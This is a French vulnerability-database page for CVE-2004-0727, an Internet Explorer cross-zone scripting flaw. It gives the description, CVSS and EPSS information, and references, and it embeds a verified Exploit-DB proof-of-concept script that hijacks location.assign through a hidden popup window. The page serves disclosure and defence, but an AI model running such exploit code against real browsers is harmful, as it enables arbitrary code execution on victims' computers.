CVE-2004-0727 : Détail

CVE-2004-0727

58.31%V4
Network
2004-07-23
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability."

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 24265

Date de publication : 2004-07-11 22h00 +00:00
Auteur : Paul
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/10689/info A vulnerability exists in Microsoft Internet Explorer that may allow cross-domain/cross-zone scripting. It is reported that the vulnerability presents itself due to a failure to properly validate trust relationships between method calls that are made in separate Internet Explorer windows. This may make it possible for script code to access properties of a foreign domain or Security Zone. Exploitation may permit execution of arbitrary code as the victim user. <script> //courtesy of Paul function govuln(){ var w=window.open("javascript:setInterval(function(){try{var tempvar=opener.location.href;}catch(e){location.assign('javascript:document.innerHTML=&quot;<title>Microsoft Corporation</title>0wned&quot;');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000"); w.location.assign=location.assign; location.href="http://www.microsoft.com"; } govuln() </script> The following example was provided: <script>; var var1=location.assign; alert("Assign function of the current window:\n"+var1); var w=window.open("about:blank","_blank"); var var2=w.location.assign; var w=alert("Assign function of the new window:\n"+var2); w.close(); </script>; This will reportedly generate two alerts describing the assign().

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6.0.2800.1106

Références

http://www.kb.cert.org/vuls/id/207264
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/12048
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA04-293A.html
Tags : third-party-advisory, x_refsource_CERT
http://marc.info/?l=bugtraq&m=108966512815373&w=2
Tags : mailing-list, x_refsource_BUGTRAQ